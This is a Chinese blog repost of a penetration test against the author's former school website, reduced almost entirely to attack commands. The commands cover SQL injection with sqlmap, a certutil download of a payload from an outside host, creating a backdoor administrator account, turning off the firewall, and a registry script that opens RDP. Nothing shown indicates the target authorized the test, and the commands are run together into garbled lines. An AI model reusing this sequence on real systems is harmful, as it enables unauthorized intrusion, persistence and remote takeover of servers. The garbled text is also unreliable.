声明:本文仅限于技术讨论与分享,严禁用于非法途径。若读者因此作出任何危害网络安全行为后果自负,与本号及原作者无关。
前言
http://url/newdetail.aspx?id=11999' or 1=1 --python sqlmap.py -u "http://url/newdetail.aspx?id=119" --batch --dbspython sqlmap.py -u "http://url/newdetail.aspx?id=119" --batch -users
nt authority system 是内置的系统管理账户
chdir
Dir c:
python -m SimpleHTTPServer 80
ping wt070h.dnslog.cncertutil.exe -urlcache -split -f http://funny_ip/amazing1x
#新建用户net user amazingadmin123 amazing.123456 /add#赋予权限net localgroup Administrators amazingadmin123 /add#激活用户net user amazingadmin123 /active:yes#关闭防火墙netsh firewall set opmode mode=disable#开启默认设置 netsh firewall reset
echo Windows Registry Editor Version 5.00 >>3389.regecho [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server] >>3389.regecho "fDenyTSConnections"=dword:00000000 >>3389.regecho [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp] >>3389.regecho "ortNumber"=dword:00000D3D >>3389.regecho [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp] >>3389.regecho "PortNumber"=dword:00000D3D >>3389.regregedit /s 3389.reg
点到即止!
文章来源:先知社区
作者:何止
如有侵权,请联系删除
本文始发于微信公众号(HACK之道):实战 | 记一次对母校站点的渗透测试
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论